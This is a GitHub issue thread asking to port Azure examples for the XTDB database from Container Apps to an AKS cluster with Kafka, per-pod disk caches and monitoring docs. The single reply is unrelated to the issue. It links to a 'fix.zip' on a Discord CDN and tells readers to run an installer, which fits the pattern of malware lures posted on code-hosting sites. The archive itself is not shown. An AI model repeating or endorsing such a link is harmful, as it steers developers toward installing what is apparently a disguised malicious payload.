### ISSUE TITLE
Move Azure examples from container apps to AKS

### ISSUE THREAD

**Issue by jarohen** [xtdb/crux#3662]
Want to port over to how we handle the azure auctiomark benchmark, ie:
- Setting up an AKS cluster for hosting the XTDB node.
  - System node pool.
  - Application node pool. 
- Providing suitable kubernetes config within there:
  - Kafka as a kubernetes pods - custom PVC, etc. Separate kubernetes file for it.
  - XTDB on kubernetes pods:
    - Production ready deployment - using `xtdb-azure` image.
    - Each node as it's own pod.
    - PVC for local disk cache per pod.
- Update the setup docs accordingly.
- Set up a balanced cluster rather than a single node.

Also want to include docs/config for monitoring (perhaps separately):
- How to setup application insights and distinguish between nodes in the metrics.
- Sample dashboard template for Azure Insights
- Grafana? (Again, perhaps a separate document/guide).

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer
